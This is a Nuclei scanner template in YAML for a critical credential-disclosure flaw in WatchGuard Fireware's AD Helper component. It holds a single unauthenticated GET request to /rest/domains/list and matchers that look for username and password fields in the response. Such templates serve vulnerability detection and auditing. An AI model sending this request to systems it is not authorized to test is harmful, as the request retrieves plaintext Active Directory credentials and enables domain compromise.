40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: watchguard-credentials-disclosure
|
|
|
|
info:
|
|
name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
|
|
author: gy741
|
|
severity: critical
|
|
description: WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48203
|
|
- https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-288
|
|
metadata:
|
|
max-request: 1
|
|
tags: watchguard,disclosure,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"fullyQualifiedName"'
|
|
- '"logonDomain"'
|
|
- '"username"'
|
|
- '"password"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100f8e0d27df72b2fe1c8093387e92007e5eadff0eae03e14635e3b39fe8fbb075f022100ed19afcc7b593591a47321f72c10486386adef88bc1291e7383f92e98f0356f9:922c64590222798bb761d5b6d8e72950
|